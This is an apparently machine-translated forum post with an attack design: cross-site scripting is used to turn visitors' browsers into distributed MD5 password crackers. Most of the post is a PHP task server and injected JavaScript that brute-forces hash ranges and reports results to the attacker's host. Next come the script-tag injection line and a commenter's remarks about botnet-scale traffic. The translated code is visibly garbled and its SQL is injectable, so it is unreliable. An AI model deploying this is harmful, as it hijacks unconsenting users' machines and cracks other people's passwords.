XSS distributed cracking

What can XSS do? Attackers can steal information, attack worm, phishing, and DDOS... What is the problem with the distributed cracking of xss ?? XSS is based on the user's PC rather than the server, so the amount of X is definitely a huge drop. For example, a Baidu Post-It xss can blow up your inbox in minutes, so why don't we make good use of these PCs to serve us? Due to browser restrictions, few services may be provided, but computing is still possible. For example, if I write a js script on my server, when called by an xss user, each user is assigned a secret and a different blasting interval (for example, 1-200000 ...), To allow the user's browser to perform computation and match. If a browser computes and matches successfully, the system returns the cracked plaintext. Otherwise, it loads the js again and continues to crack the attack. If the xss is large, it can be broken in seconds !!! The idea is to paste the MD5 cracking test code:

<? Php $ link = mysql_connect ('localhost', 'root', 'passsss'); if (! $ Link) {die ('could not connect :'. mysql_error ();} mysql_select_db ('xss _ crack ', $ link) or die ('can \' t use foo :'. mysql_error ();?> <? Php if (isset ($ _ GET ['edit']):?> <Form action = "" method = "POST"> ciphertext: <input type = "text" name = "encode" value = ""/> start point: <input type = "text" name = "current" value = "0"/> interval: <input type = "text" name = "region" value = "10000"> <input type = "submit" value = "Add"/> </form> <? Php elseif (isset ($ _ GET ['look']): $ SQL = "select encode, decode from crack order by addtime "; $ res = @ mysql_query ($ SQL); echo '<pre>'; if (mysql_num_rows ($ res)> 0) {while ($ row = mysql_fetch_object ($ res )) {echo $ row-> encode. "--"; echo $ row-> decode; echo "\ r \ n";} mysql_free_result ($ res);} echo '</pre>'; endif;?> <? Phpif (empty ($ _ GET) {$ id = ''; $ encode =''; $ current = ''; $ region = ''; $ SQL = "select * from crack where cracked = 0 order by addtime limit 1;"; $ res = @ mysql_query ($ SQL); if (mysql_num_rows ($ res)> 0) {while ($ row = mysql_fetch_object ($ res) {$ id = $ row-> id; $ encode = $ row-> encode; $ current = $ row-> current; $ region = $ row-> region;} mysql_free_result ($ res); $ SQL = "update crack set cu Rrent = current + region where id = $ id "; $ res = @ mysql_query ($ SQL) ;}}?> <? Php if (empty ($ _ POST )&&! Empty ($ id):?> /** A JavaScript implementation of the RSA Data Security, Inc. MD5 Message * Digest Algorithm, as defined in RFC 1321. * Copyright (C) Paul Johnston 1999-2000. * Updated by Greg Holt 2000-2001. * See http://pajhome.org.uk/site/legal.html For details. */var hex_chr = "0123456789 abcdef"; function rhex (num) {str = ""; for (j = 0; j <= 3; j ++) str + = hex_chr.charAt (num> (j * 8 + 4) & 0x0F) + hex_chr.charAt (num> (j * 8) & 0x0F ); return str;} function str2blks_MD5 (str) {nblk = (str. length + 8)> 6) + 1; blks = new Array (nblk * 16); for (I = 0; I <nblk * 16; I ++) blks [I] = 0; for (I = 0; I <str. length; I ++) blks [I> 2] | = Str. charCodeAt (I) <(I % 4) * 8); blks [I> 2] | = 0x80 <(I % 4) * 8 ); blks [nblk * 16-2] = str. length * 8; return blks;} function add (x, y) {var lsw = (x & 0 xFFFF) + (y & 0 xFFFF ); var msw = (x> 16) + (y> 16) + (lsw> 16); return (msw <16) | (lsw & 0 xFFFF );} function rol (num, cnt) {return (num <cnt) | (num> (32-cnt);} function CEN (q, a, B, x, s, t) {return add (rol (add (Add (a, q), add (x, t), s), B);} function ff (a, B, c, d, x, s, t) {return CEN (B & c) | ((~ B) & d), a, B, x, s, t);} function gg (a, B, c, d, x, s, t) {return CEN (B & d) | (c &(~ D), a, B, x, s, t);} function hh (a, B, c, d, x, s, t) {return CEN (B ^ c ^ d, a, B, x, s, t);} function ii (a, B, c, d, x, s, t) {return CEN (c ^ (B | (~ D), a, B, x, s, t);} function MD5 (str) {x = str2blks_MD5 (str); var a = 1732584193; var B =-271733879; var c =-1732584194; var d = 271733878; for (I = 0; I <x. length; I + = 16) {var olda = a; var oldb = B; var oldc = c; var oldd = d; a = ff (a, B, c, d, x [I + 0], 7,-680876936); d = ff (d, a, B, c, x [I + 1], 12,-389564586 ); c = ff (c, d, a, B, x [I + 2], 17,606 105819); B = ff (B, c, d, a, x [I + 3], 22,-1044525330); a = ff (a, B, c, d, x [I + 4], 7,-176418897); d = ff (d, a, B, c, x [I + 5], 12,120 0080426); c = ff (c, d, a, B, x [I + 6], 17, -1473231341); B = ff (B, c, d, a, x [I + 7], 22,-45705983); a = ff (a, B, c, d, x [I + 8], 7, 1770035416); d = ff (d, a, B, c, x [I + 9], 12,-1958414417 ); c = ff (c, d, a, B, x [I + 10], 17,- 42063); B = ff (B, c, d,, x [I + 11], 22,-1990404162); a = ff (a, B, C, d, x [I + 12], 7, 1804603682); d = ff (d, a, B, c, x [I + 13], 12, -40341101); c = ff (c, d, a, B, x [I + 14], 17,-1502002290); B = ff (B, c, d, a, x [I + 15], 22,123 6582429); a = gg (a, B, c, d, x [I + 1], 5,-165796510 ); d = gg (d, a, B, c, x [I + 6], 9,-1069501632); c = gg (c, d, a, B, x [I + 11], 14,643 717713); B = gg (B, c, d, a, x [I + 0], 20,-373897302 ); a = gg (a, B, c, d, x [I + 5], 5,-701558691) ); D = gg (d, a, B, c, x [I + 10], 9, 38016083); c = gg (c, d, a, B, x [I + 15], 14,-660478335); B = gg (B, c, d, a, x [I + 4], 20,-405537848 ); a = gg (a, B, c, d, x [I + 9], 5, 568446438); d = gg (d, a, B, c, x [I + 14], 9,-1019803690); c = gg (c, d, a, B, x [I + 3], 14,-187363961 ); B = gg (B, c, d, a, x [I + 8], 20,116 running 1501); a = gg (a, B, c, d, x [I + 13], 5,-1444681467); d = gg (d, a, B, c, x [I + 2], 9 ,-51403784); c = gg (c, d, a, B, x [I + 7], 14,173 5328473); B = gg (B, c, d,, x [I + 12], 20,-1926607734); a = hh (a, B, c, d, x [I + 5], 4,-378558 ); d = hh (d, a, B, c, x [I + 8], 11,-2022574463); c = hh (c, d, a, B, x [I + 11], 16,183 9030133); B = hh (B, c, d, a, x [I + 14], 23,-35309556 ); a = hh (a, B, c, d, x [I + 1], 4,-1530992060); d = hh (d, a, B, c, x [I + 4], 11,127 2893353); c = hh (c, d, a, B, X [I + 7], 16,-155497632); B = hh (B, c, d, a, x [I + 10], 23,-1094730640 ); a = hh (a, B, c, d, x [I + 13], 4, 681279174); d = hh (d, a, B, c, x [I + 0], 11,-358537222); c = hh (c, d, a, B, x [I + 3], 16,-722521979 ); B = hh (B, c, d, a, x [I + 6], 23,760 29189); a = hh (a, B, c, d, x [I + 9], 4,-640364487); d = hh (d, a, B, c, x [I + 12], 11,-421815835 ); c = hh (c, d, a, B, x [I + 15], 16,530 742520); B = h H (B, c, d, a, x [I + 2], 23,-995338651); a = ii (a, B, c, d, x [I + 0], 6,-198630844); d = ii (d, a, B, c, x [I + 7], 10,112 6891415 ); c = ii (c, d, a, B, x [I + 14], 15,-1416354905); B = ii (B, c, d,, x [I + 5], 21,-57434055); a = ii (a, B, c, d, x [I + 12], 6, 1700485571 ); d = ii (d, a, B, c, x [I + 3], 10,-1894986606); c = ii (c, d, a, B, x [I + 10], 15,-1051523); B = ii (B, c, d, a, x [I + 1], 21,-205 (4922799); a = ii (a, B, c, d, x [I + 8], 6, 1873313359); d = ii (d, a, B, c, x [I + 15], 10,-30611744); c = ii (c, d, a, B, x [I + 6], 15,-1560198380 ); B = ii (B, c, d, a, x [I + 13], 21,130 9151649); a = ii (a, B, c, d, x [I + 4], 6,-145523070); d = ii (d, a, B, c, x [I + 11], 10,-1120210379 ); c = ii (c, d, a, B, x [I + 2], 15,718 787259); B = ii (B, c, d,, x [I + 9], 21,-343485551); a = add (a, olda); B = Add (B, oldb); c = add (c, oldc); d = add (d, oldd);} return rhex (a) + rhex (B) + rhex (c) + rhex (d);} function CreateHTTPObject () {var xmlhttp; try {xmlhttp = new ActiveXObject ("Msxml2.XMLHTTP");} catch (e) {try {xmlhttp = new ActiveXObject ("Microsoft. XMLHTTP ") ;}catch (e) {xmlhttp = false ;}} if (! Xmlhttp & typeof XMLHttpRequest! = 'Undefined') {try {xmlhttp = new XMLHttpRequest () ;}catch (e) {xmlhttp = false ;}} if (! Xmlhttp & window. createRequest) {try {xmlhttp = window. createRequest () ;}catch (e) {xmlhttp = false ;}return xmlhttp;} function post (url, data) {var xmlhttp = CreateHTTPObject (); if (xmlhttp) {xmlhttp. open ("POST", url, true); xmlhttp. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); xmlhttp. send (data) ;}} function badunload (url, id, current, region) {post (url, data );} Function sleep (n) {var start = new Date (). getTime (); while (true) {if (new Date (). getTime ()-start> n) break;} var id = <? Php echo $ id;?>; Var encode = '<? Php echo $ encode;?> '; Var current = <? Php echo $ current;?>; Var region = <? Php echo $ region;?>; Var url = '<? Php echo 'HTTP: // '. $ _ SERVER ['HTTP _ host']. $ _ SERVER ['php _ SELF'];?> '; Var data = ''; var cracked = false; var decode =''; region + = current; while (current <region) {if (MD5 (String (current )) = encode) {cracked = true; decode = current; break;} current ++;} if (cracked) {data = 'id = '+ id +' & cracked = 1' + '& decode =' + encodeURIComponent (decode); post (url, data );} else {data = 'id = '+ id +' & cracked = 0'; post (url, data); var edevil = document. createElement ('script'); edevil. Src = url; document. head. appendChild (edevil) ;}<? Php endif;?> <? Php if (isset ($ _ POST ['cracked']) {if ($ _ POST ['cracked'] = 1) {$ decode = $ _ POST ['decode']; $ id = $ _ POST ['id']; $ SQL = "update crack set cracked = 1, decode = '$ decode' where id = $ id; "; @ mysql_query ($ SQL) ;}} else {if (isset ($ _ POST ['encoding']) {$ encode = $ _ POST ['encoding']; $ current = $ _ POST ['current']; $ region = $ _ POST ['region ']; $ addtime = date ('Y-m-d H: I: s'); $ SQL = "insert into crack (encode, curren T, region, addtime) value ('$ encode',' $ current', '$ region', '$ addtime ')"; @ mysql_query ($ SQL) ;}}?>

 

I opened three tabs in chrome and cracked the eight-digit attack. It took about three minutes. This article is just a train of thought. You are welcome to continue to expand (* ^_^ *) Instructions: http: // 127.0.0.1/mian. php? Edit is the page for adding the ciphertext to be cracked http: // 127.0.0.1/mian. php? Look is to view the successful page xss point to introduce the script view source1 <script src = 'HTTP: // 127.0.0.1/main. php '> </script> because my programming technology is not good, it is only a numerical brute-force attack .... In addition, if a user closes the page halfway, and the interval allocated to the user happens to be the password between the two zones, you may not be able to crack it... Secmap: I have implemented this idea before. I finally evaluated it and found that the biggest bottleneck is that the browser's computing capability is very low. the browser's computing power is equivalent to 30% of the normal cpu. and it is not continuous, which involves the effective computing time of computing power. in a rough calculation, there is a 1 W pv. Each person stays for 15 s, which is equivalent to 40 hours of cpu time, because the browser is no better than the cpu, it is equivalent to running a single-core cpu for 12 hours ..... Even in the form of task delivery, some tasks may be received, broken, but the "result" cannot be submitted to the server. In this case, it will be less than 12 hours... The current gpu estimation is just a hundred times the cpu computing power? Ps: if there is that traffic, there is a future for botnets.